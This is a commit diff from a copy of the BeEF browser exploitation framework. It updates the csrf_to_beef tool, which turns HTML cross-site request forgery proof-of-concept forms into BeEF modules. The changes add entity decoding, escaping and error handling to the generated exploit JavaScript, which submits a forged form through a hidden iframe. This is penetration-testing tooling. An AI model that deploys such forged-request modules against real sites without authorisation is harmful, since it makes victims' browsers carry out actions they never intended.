Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add client debug info and decode html entities

Browse Source
This commit is contained in:
Brendan Coles
2014-12-06 10:20:44 +00:00
parent 614b065115
commit 63c2485e75
1 changed files with 31 additions and 19 deletions
Download Patch File Download Diff File Expand all files Collapse all files

50
tools/csrf_to_beef/csrf_to_beef
View File

@@ -5,14 +5,14 @@
# * support xhr #
# * support multipart file upload #
# * support CORS requests #
# * support character encoding #
################################################################################
$VERBOSE = false
$VERSION = '0.0.1'
$VERSION = '0.0.2'
require 'uri'
require 'getoptlong'
require 'fileutils'
require 'htmlentities'
#
# @note Ruby version check
@@ -145,7 +145,7 @@ class ModuleFile
def generate class_name, target_url, options
options_rb = ""
options.to_enum.with_index(1).each do |input, input_index|
options_rb += " { 'name' => 'input_#{input_index}', 'ui_label' => '#{input[0]}', 'value' => '#{input[1]}' },\n"
options_rb += " { 'name' => 'input_#{input_index}', 'ui_label' => %q(#{input[0]}), 'value' => %q(#{input[1]}) },\n"
end
return <<-EOF
#
@@ -157,8 +157,8 @@ class #{class_name.capitalize} < BeEF::Core::Command
def self.options
return [
{ 'name' => 'target_url', 'ui_label' => 'Target URL', 'value' => '#{target_url}' },
#{options_rb}
{ 'name' => 'target_url', 'ui_label' => 'Target URL', 'value' => %q(#{target_url}) },
#{options_rb.chomp}
]
end
@@ -178,7 +178,7 @@ class CommandFile
def generate class_name, method, enctype, options
options_js = ""
options.to_enum.with_index(1).each do |input, input_index|
options_js += " {'type':'hidden', 'name':'#{input.first}', 'value':'<%= @input_#{input_index} %>' },\n"
options_js += " {'type':'hidden', 'name':'#{input.first.to_s.gsub(/'/, "\\'")}', 'value':'<%= CGI.escape(@input_#{input_index}) %>' },\n"
end
return <<-EOF
//
@@ -188,21 +188,33 @@ class CommandFile
//
beef.execute(function() {
var target_url = '<%= @target_url %>';
var target_url = '<%= @target_url.to_s.gsub(/'/, "\\\\'") %>';
var timeout = 15;
var #{class_name}_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target_url, "#{method}", "#{enctype}",
exploit = function() {
var #{class_name}_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target_url, '#{method.to_s.gsub(/'/, "\\'")}', '#{enctype.to_s.gsub(/'/, "\\'")}',
[
#{options_js}
#{options_js.chomp}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
}
cleanup = function() {
document.body.removeChild(#{class_name}_iframe_<%= @command_id %>);
try {
document.body.removeChild(#{class_name}_iframe_<%= @command_id %>);
} catch(e) {
beef.debug("Could not remove iframe: " + e.message);
}
}
setTimeout("cleanup()", timeout*1000);
try {
exploit();
} catch(e) {
beef.debug("Exploit failed: " + e.message);
}
});
EOF
end
@@ -226,7 +238,7 @@ def main fname, mname
end
# parse PoC file
if html.to_s =~ /var xhr = new XMLHttpRequest/
if html.to_s =~ /var xhr = new XMLHttpRequest/
print_error "Could not parse PoC file - XMLHttpRequest is not yet supported."
exit 1
elsif html.to_s !~ /<form/
@@ -240,19 +252,19 @@ def main fname, mname
options = []
html.each do |line|
case line
# parse form tag
# parse form tag as request options
when /<form/
Hash[line.scan(/(\w+)="(.*?)"/)].each do |k, v|
case k
when 'action'
target_url = v
target_url = HTMLEntities.new.decode(v)
when 'method'
method = v
method = HTMLEntities.new.decode(v)
when 'enctype'
enctype = v
enctype = HTMLEntities.new.decode(v)
end
end
# parse input tags (module options)
# parse form input tags as module options
when /<input/
input_name = nil
input_value = nil
@@ -261,9 +273,9 @@ def main fname, mname
when 'type'
next
when 'name'
input_name = v
input_name = HTMLEntities.new.decode(v)
when 'value'
input_value = v
input_value = HTMLEntities.new.decode(v)
end
end
unless input_name.nil?